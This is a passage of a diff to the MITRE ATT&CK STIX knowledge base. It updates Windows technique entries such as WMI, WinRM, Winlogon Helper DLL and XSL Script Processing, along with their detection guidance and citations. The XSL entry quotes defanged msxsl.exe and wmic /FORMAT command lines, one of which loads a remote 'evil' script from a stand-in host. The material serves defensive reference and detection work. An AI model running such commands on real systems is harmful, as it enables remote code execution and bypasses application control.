+ "description": "Adversaries may abuse the Windows command shell for execution. The Windows command shell (cmd.exe) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. \n\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.\n\nAdversaries may leverage cmd.exe to execute various commands and payloads. Common uses include cmd.exe /c to execute a single command, or abusing cmd.exe interactively with input and output forwarded over a command and control channel.",
+ "id": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
"x_mitre_version": "1.0",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
@@ -28975,29 +29981,29 @@
],
"modified": "2020-03-29T23:07:55.953Z",
"created": "2020-02-04T19:17:41.767Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator",
+ "SYSTEM"
],
+ "x_mitre_detection": "Monitor and investigate attempts to modify DACLs and file/directory ownership. Many of the commands used to modify DACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.\n\nConsider enabling file/directory permission change auditing on folders containing key binary/configuration files. For example, Windows Security Log events (Event ID 4670) are created when DACLs are modified.(Citation: EventTracker File Permissions Feb 2014)",
"x_mitre_data_sources": [
"Windows event logs",
"Process command-line parameters",
"Process monitoring",
"File monitoring"
],
- "x_mitre_detection": "Monitor and investigate attempts to modify DACLs and file/directory ownership. Many of the commands used to modify DACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.\n\nConsider enabling file/directory permission change auditing on folders containing key binary/configuration files. For example, Windows Security Log events (Event ID 4670) are created when DACLs are modified.(Citation: EventTracker File Permissions Feb 2014)",
- "x_mitre_permissions_required": [
- "User",
- "Administrator",
- "SYSTEM"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Windows Management Instrumentation",
- "description": "Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) (Citation: Wikipedia SMB) and Remote Procedure Call Service (RPCS) (Citation: TechNet RPC) for remote access. RPCS operates over port 135. (Citation: MSDN WMI)\n\nAn adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI 2015)",
+ "description": "Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) (Citation: Wikipedia SMB) and Remote Procedure Call Service (RPCS) (Citation: TechNet RPC) for remote access. RPCS operates over port 135. (Citation: MSDN WMI)\n\nAn adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015)",
"external_references": [
{
"source_name": "mitre-attack",
@@ -29019,6 +30025,11 @@
"description": "Microsoft. (n.d.). Windows Management Instrumentation. Retrieved April 27, 2016.",
"source_name": "MSDN WMI"
},
+ {
+ "source_name": "FireEye WMI SANS 2015",
+ "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf",
+ "description": "Devon Kerr. (2015). There's Something About WMI. Retrieved May 4, 2020."
+ },
{
"url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf",
"description": "Ballenthin, W., et al. (2015). Windows Management Instrumentation (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016.",
@@ -29035,28 +30046,28 @@
"phase_name": "execution"
}
],
- "modified": "2020-03-09T14:52:26.618Z",
+ "modified": "2020-05-13T22:50:51.258Z",
"created": "2017-05-31T21:30:44.329Z",
- "x_mitre_is_subtechnique": false,
- "x_mitre_version": "1.1",
+ "x_mitre_system_requirements": [
+ "WMI service, winmgmt, running.\nHost/network firewalls allowing SMB and WMI ports from source to destination.\nSMB authentication."
+ ],
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_remote_support": true,
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator"
+ ],
+ "x_mitre_detection": "Monitor network traffic for WMI connections; the use of WMI in environments that do not typically use WMI may be suspect. Perform process monitoring to capture command-line arguments of \"wmic\" and detect commands that are used to perform remote behavior. (Citation: FireEye WMI 2015)",
"x_mitre_data_sources": [
"Authentication logs",
"Netflow/Enclave netflow",
"Process monitoring",
"Process command-line parameters"
],
- "x_mitre_detection": "Monitor network traffic for WMI connections; the use of WMI in environments that do not typically use WMI may be suspect. Perform process monitoring to capture command-line arguments of \"wmic\" and detect commands that are used to perform remote behavior. (Citation: FireEye WMI 2015)",
- "x_mitre_permissions_required": [
- "User",
- "Administrator"
- ],
- "x_mitre_remote_support": true,
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_system_requirements": [
- "WMI service, winmgmt, running.\nHost/network firewalls allowing SMB and WMI ports from source to destination.\nSMB authentication."
- ]
+ "x_mitre_version": "1.1",
+ "x_mitre_is_subtechnique": false
},
{
"external_references": [
@@ -29110,6 +30121,16 @@
"description": "Mandiant. (2015, February 24). M-Trends 2015: A View from the Front Lines. Retrieved May 18, 2016.",
"source_name": "Mandiant M-Trends 2015"
},
+ {
+ "source_name": "FireEye WMI SANS 2015",
+ "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf",
+ "description": "Devon Kerr. (2015). There's Something About WMI. Retrieved May 4, 2020."
+ },
+ {
+ "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf",
+ "description": "Ballenthin, W., et al. (2015). Windows Management Instrumentation (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016.",
+ "source_name": "FireEye WMI 2015"
+ },
{
"url": "https://www.secureworks.com/blog/wmi-persistence",
"description": "Dell SecureWorks Counter Threat Unit\u2122 (CTU) Research Team. (2016, March 28). A Novel WMI Persistence Implementation. Retrieved March 30, 2016.",
@@ -29141,7 +30162,7 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Windows Management Instrumentation Event Subscription",
- "description": "Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user loging, or the computer's uptime. (Citation: Mandiant M-Trends 2015)\n\nAdversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription. (Citation: Dell WMI Persistence) (Citation: Microsoft MOF May 2018)\n\nWMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.",
+ "description": "Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user loging, or the computer's uptime. (Citation: Mandiant M-Trends 2015)\n\nAdversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription. (Citation: Dell WMI Persistence) (Citation: Microsoft MOF May 2018)\n\nWMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.",
"id": "attack-pattern--910906dd-8c0a-475a-9cc1-5e029e2fad58",
"type": "attack-pattern",
"kill_chain_phases": [
@@ -29154,23 +30175,23 @@
"phase_name": "persistence"
}
],
- "modified": "2020-03-24T14:58:13.113Z",
+ "modified": "2020-05-05T12:02:45.522Z",
"created": "2020-01-24T14:07:56.276Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "SYSTEM"
],
+ "x_mitre_detection": "Monitor WMI event subscription entries, comparing current WMI event subscriptions to known good subscriptions for each host. Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempts at persistence. (Citation: TechNet Autoruns) (Citation: Medium Detecting WMI Persistence)\n\nMonitor processes and command-line arguments that can be used to register WMI persistence, such as the Register-WmiEvent [PowerShell](https://attack.mitre.org/techniques/T1086) cmdlet (Citation: Microsoft Register-WmiEvent), as well as those that result from the execution of subscriptions (i.e. spawning from the WmiPrvSe.exe WMI Provider Host process).",
"x_mitre_data_sources": [
"Process command-line parameters",
"Process monitoring",
"WMI Objects"
],
- "x_mitre_detection": "Monitor WMI event subscription entries, comparing current WMI event subscriptions to known good subscriptions for each host. Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempts at persistence. (Citation: TechNet Autoruns) (Citation: Medium Detecting WMI Persistence)\n\nMonitor processes and command-line arguments that can be used to register WMI persistence, such as the Register-WmiEvent [PowerShell](https://attack.mitre.org/techniques/T1086) cmdlet (Citation: Microsoft Register-WmiEvent), as well as those that result from the execution of subscriptions (i.e. spawning from the WmiPrvSe.exe WMI Provider Host process).",
- "x_mitre_permissions_required": [
- "Administrator",
- "SYSTEM"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "attack-pattern--c3bce4f4-9795-46c6-976e-8676300bbc39",
@@ -29208,6 +30229,22 @@
"created": "2017-05-31T21:30:33.723Z"
},
{
+ "created": "2020-02-11T18:29:47.757Z",
+ "modified": "2020-03-25T12:25:03.014Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "lateral-movement"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65",
+ "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.\n\nWinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).(Citation: Microsoft WinRM) It may be called with the `winrm` command or by any number of programs such as PowerShell.(Citation: Jacobsen 2014)",
+ "name": "Windows Remote Management",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -29230,22 +30267,6 @@
"description": "French, D. (2018, September 30). Detecting Lateral Movement Using Sysmon and Splunk. Retrieved October 11, 2019."
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Windows Remote Management",
- "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.\n\nWinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).(Citation: Microsoft WinRM) It may be called with the `winrm` command or by any number of programs such as PowerShell.(Citation: Jacobsen 2014)",
- "id": "attack-pattern--60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "lateral-movement"
- }
- ],
- "modified": "2020-03-25T12:25:03.014Z",
- "created": "2020-02-11T18:29:47.757Z",
"x_mitre_platforms": [
"Windows"
],
@@ -29312,10 +30333,15 @@
],
"modified": "2020-03-25T22:22:10.041Z",
"created": "2020-01-17T19:13:50.402Z",
- "x_mitre_contributors": [
- "Matthew Demaske, Adaptforward",
- "Travis Smith, Tripwire",
- "Pedro Harrison"
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0",
+ "x_mitre_detection": "Monitor processes and command-line arguments for actions that could create or modify services. Command-line invocation of tools capable of adding or modifying services may be unusual, depending on how systems are typically used in a particular environment. Services may also be modified through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data. Remote access tools with built-in features may also interact directly with the Windows API to perform these functions outside of typical system utilities. Collect service utility execution and service binary path arguments used for analysis. Service binary paths may even be changed to execute commands or scripts. \n\nLook for changes to service Registry entries that do not correlate with known software, patch cycles, etc. Service information is stored in the Registry at HKLM\\SYSTEM\\CurrentControlSet\\Services. Changes to the binary path and the service startup type changed from manual or disabled to automatic, if it does not typically do so, may be suspicious. Tools such as Sysinternals Autoruns may also be used to detect system service changes that could be attempts at persistence.(Citation: TechNet Autoruns) \n\nCreation of new services may generate an alterable event (ex: Event ID 4697 and/or 7045 (Citation: Microsoft 4697 APR 2017)(Citation: Microsoft Windows Event Forwarding FEB 2018)). New, benign services may be created during installation of new software.\n\nSuspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data. Look for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
+ "x_mitre_effective_permissions": [
+ "Administrator",
+ "SYSTEM"
],
"x_mitre_data_sources": [
"API monitoring",
@@ -29325,15 +30351,10 @@
"File monitoring",
"Windows Registry"
],
- "x_mitre_effective_permissions": [
- "Administrator",
- "SYSTEM"
- ],
- "x_mitre_detection": "Monitor processes and command-line arguments for actions that could create or modify services. Command-line invocation of tools capable of adding or modifying services may be unusual, depending on how systems are typically used in a particular environment. Services may also be modified through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data. Remote access tools with built-in features may also interact directly with the Windows API to perform these functions outside of typical system utilities. Collect service utility execution and service binary path arguments used for analysis. Service binary paths may even be changed to execute commands or scripts. \n\nLook for changes to service Registry entries that do not correlate with known software, patch cycles, etc. Service information is stored in the Registry at HKLM\\SYSTEM\\CurrentControlSet\\Services. Changes to the binary path and the service startup type changed from manual or disabled to automatic, if it does not typically do so, may be suspicious. Tools such as Sysinternals Autoruns may also be used to detect system service changes that could be attempts at persistence.(Citation: TechNet Autoruns) \n\nCreation of new services may generate an alterable event (ex: Event ID 4697 and/or 7045 (Citation: Microsoft 4697 APR 2017)(Citation: Microsoft Windows Event Forwarding FEB 2018)). New, benign services may be created during installation of new software.\n\nSuspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data. Look for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_contributors": [
+ "Matthew Demaske, Adaptforward",
+ "Travis Smith, Tripwire",
+ "Pedro Harrison"
]
},
{
@@ -29367,6 +30388,26 @@
"created": "2017-05-31T21:30:20.148Z"
},
{
+ "created": "2020-01-24T16:59:59.688Z",
+ "modified": "2020-04-21T16:00:41.277Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "persistence"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "privilege-escalation"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--6836813e-8ec8-4375-b459-abb388cb1a35",
+ "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\\Software[\\\\Wow6432Node\\\\]\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are used to manage additional helper programs and functionalities that support Winlogon. (Citation: Cylance Reg Persistence Sept 2013) \n\nMalicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013)\n\n* Winlogon\\Notify - points to notification package DLLs that handle Winlogon events\n* Winlogon\\Userinit - points to userinit.exe, the user initialization program executed when a user logs on\n* Winlogon\\Shell - points to explorer.exe, the system shell executed when a user logs on\n\nAdversaries may take advantage of these features to repeatedly execute malicious code and establish persistence.",
+ "name": "Winlogon Helper DLL",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -29389,26 +30430,6 @@
"source_name": "TechNet Autoruns"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Winlogon Helper DLL",
- "description": "\nAdversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\\Software[\\\\Wow6432Node\\\\]\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are used to manage additional helper programs and functionalities that support Winlogon. (Citation: Cylance Reg Persistence Sept 2013) \n\nMalicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013)\n\n* Winlogon\\Notify - points to notification package DLLs that handle Winlogon events\n* Winlogon\\Userinit - points to userinit.exe, the user initialization program executed when a user logs on\n* Winlogon\\Shell - points to explorer.exe, the system shell executed when a user logs on\n\nAdversaries may take advantage of these features to repeatedly execute malicious code and establish persistence.",
- "id": "attack-pattern--6836813e-8ec8-4375-b459-abb388cb1a35",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "persistence"
- },
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "privilege-escalation"
- }
- ],
- "modified": "2020-03-25T16:17:22.487Z",
- "created": "2020-01-24T16:59:59.688Z",
"x_mitre_platforms": [
"Windows"
],
@@ -29432,7 +30453,7 @@
"id": "attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "XSL Script Processing",
- "description": "Adversaries may bypass application whitelisting and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)\n\nAdversaries may abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses. Similar to [Trusted Developer Utilities Proxy Execution](https://attack.mitre.org/techniques/T1127), the Microsoft common line transformation utility binary (msxsl.exe) (Citation: Microsoft msxsl.exe) can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. (Citation: Penetration Testing Lab MSXSL July 2017) Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. (Citation: Reaqta MSXSL Spearphishing MAR 2018) Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.(Citation: XSL Bypass Mar 2019)\n\nCommand-line examples:(Citation: Penetration Testing Lab MSXSL July 2017)(Citation: XSL Bypass Mar 2019)\n\n* msxsl.exe customers[.]xml script[.]xsl\n* msxsl.exe script[.]xsl script[.]xsl\n* msxsl.exe script[.]jpeg script[.]jpeg\n\nAnother variation of this technique, dubbed \u201cSquiblytwo\u201d, involves using [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) to invoke JScript or VBScript within an XSL file.(Citation: LOLBAS Wmic) This technique can also execute local/remote scripts and, similar to its [Regsvr32](https://attack.mitre.org/techniques/T1117)/ \"Squiblydoo\" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) provided they utilize the /FORMAT switch.(Citation: XSL Bypass Mar 2019)\n\nCommand-line examples:(Citation: XSL Bypass Mar 2019)(Citation: LOLBAS Wmic)\n\n* Local File: wmic process list /FORMAT:evil[.]xsl\n* Remote File: wmic os get /FORMAT:\u201dhttps[:]//example[.]com/evil[.]xsl\u201d",
+ "description": "Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)\n\nAdversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control. Similar to [Trusted Developer Utilities Proxy Execution](https://attack.mitre.org/techniques/T1127), the Microsoft common line transformation utility binary (msxsl.exe) (Citation: Microsoft msxsl.exe) can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. (Citation: Penetration Testing Lab MSXSL July 2017) Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. (Citation: Reaqta MSXSL Spearphishing MAR 2018) Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.(Citation: XSL Bypass Mar 2019)\n\nCommand-line examples:(Citation: Penetration Testing Lab MSXSL July 2017)(Citation: XSL Bypass Mar 2019)\n\n* msxsl.exe customers[.]xml script[.]xsl\n* msxsl.exe script[.]xsl script[.]xsl\n* msxsl.exe script[.]jpeg script[.]jpeg\n\nAnother variation of this technique, dubbed \u201cSquiblytwo\u201d, involves using [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) to invoke JScript or VBScript within an XSL file.(Citation: LOLBAS Wmic) This technique can also execute local/remote scripts and, similar to its [Regsvr32](https://attack.mitre.org/techniques/T1117)/ \"Squiblydoo\" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) provided they utilize the /FORMAT switch.(Citation: XSL Bypass Mar 2019)\n\nCommand-line examples:(Citation: XSL Bypass Mar 2019)(Citation: LOLBAS Wmic)\n\n* Local File: wmic process list /FORMAT:evil[.]xsl\n* Remote File: wmic os get /FORMAT:\u201dhttps[:]//example[.]com/evil[.]xsl\u201d",
"external_references": [
{
"source_name": "mitre-attack",
@@ -29485,13 +30506,23 @@
"kill_chain_name": "mitre-attack"
}
],
- "modified": "2020-02-05T14:15:23.103Z",
+ "modified": "2020-06-20T22:45:46.479Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.2",
- "x_mitre_contributors": [
- "Avneet Singh",
- "Casey Smith",
- "Praetorian"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_system_requirements": [
+ "Microsoft Core XML Services (MSXML) or access to wmic.exe"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of msxsl.exe and wmic.exe. Compare recent invocations of these utilities with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity (ex: URL command line arguments, creation of external network connections, loading of DLLs associated with scripting). (Citation: LOLBAS Wmic) (Citation: Twitter SquiblyTwo Detection APR 2018) Command arguments used before and after the script invocation may also be useful in determining the origin and purpose of the payload being loaded.\n\nThe presence of msxsl.exe or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.",
+ "x_mitre_defense_bypassed": [
+ "Anti-virus",
+ "Application control",
+ "Digital Certificate Validation"
],
"x_mitre_data_sources": [
"Process monitoring",
@@ -29499,22 +30530,12 @@
"Process use of network",
"DLL monitoring"
],
- "x_mitre_defense_bypassed": [
- "Anti-virus",
- "Application whitelisting",
- "Digital Certificate Validation"
+ "x_mitre_contributors": [
+ "Avneet Singh",
+ "Casey Smith",
+ "Praetorian"
],
- "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of msxsl.exe and wmic.exe. Compare recent invocations of these utilities with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity (ex: URL command line arguments, creation of external network connections, loading of DLLs associated with scripting). (Citation: LOLBAS Wmic) (Citation: Twitter SquiblyTwo Detection APR 2018) Command arguments used before and after the script invocation may also be useful in determining the origin and purpose of the payload being loaded.\n\nThe presence of msxsl.exe or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_system_requirements": [
- "Microsoft Core XML Services (MSXML) or access to wmic.exe"
- ],
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "1.2"
},
{
"id": "relationship--483a70b9-eae9-4d5f-925c-95c2dd7b9fa5",
@@ -29769,7 +30790,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--10d5f3b7-6be6-4da5-9a77-0f1e2bbfcc44",
"type": "relationship",
- "modified": "2020-03-30T20:20:02.779Z",
+ "modified": "2020-07-07T16:44:26.672Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -29896,27 +30917,27 @@
],
"external_references": [
{
- "source_name": "Cymmetria Patchwork",
+ "url": "https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf",
"description": "Cymmetria. (2016). Unveiling Patchwork - The Copy-Paste APT. Retrieved August 3, 2016.",
- "url": "https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf"
+ "source_name": "Cymmetria Patchwork"
},
{
- "url": "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf",
+ "source_name": "TrendMicro Patchwork Dec 2017",
"description": "Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018.",
- "source_name": "TrendMicro Patchwork Dec 2017"
+ "url": "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf"
}
],
"source_ref": "intrusion-set--17862c7d-9e60-48a0-b48e-da4dc4c3f6b0",
"relationship_type": "uses",
"target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
"type": "relationship",
- "modified": "2019-07-11T13:53:05.558Z",
+ "modified": "2020-06-29T15:54:17.677Z",
"created": "2017-05-31T21:33:27.077Z"
},
{
"id": "relationship--99e9583f-433d-437d-bf37-7ea2b3f1b613",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has compressed data into password-protected RAR archives prior to exfiltration.(Citation: Secureworks BRONZE BUTLER Oct 2017)",
+ "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has compressed data into password-protected RAR archives prior to exfiltration.(Citation: Secureworks BRONZE BUTLER Oct 2017)(Citation: Trend Micro Tick November 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -29925,13 +30946,18 @@
"url": "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses",
"description": "Counter Threat Unit Research Team. (2017, October 12). BRONZE BUTLER Targets Japanese Enterprises. Retrieved January 4, 2018.",
"source_name": "Secureworks BRONZE BUTLER Oct 2017"
+ },
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
}
],
"source_ref": "intrusion-set--93f52415-0fe4-4d3d-896c-fc9b8e88ab90",
"relationship_type": "uses",
"target_ref": "attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662",
"type": "relationship",
- "modified": "2020-03-30T01:58:00.081Z",
+ "modified": "2020-06-24T01:27:31.804Z",
"created": "2018-01-16T16:13:52.465Z"
},
{
@@ -30516,7 +31542,7 @@
],
"external_references": [
{
- "url": "https://www.emc.com/collateral/white-papers/h12756-wp-shell-crew.pdf",
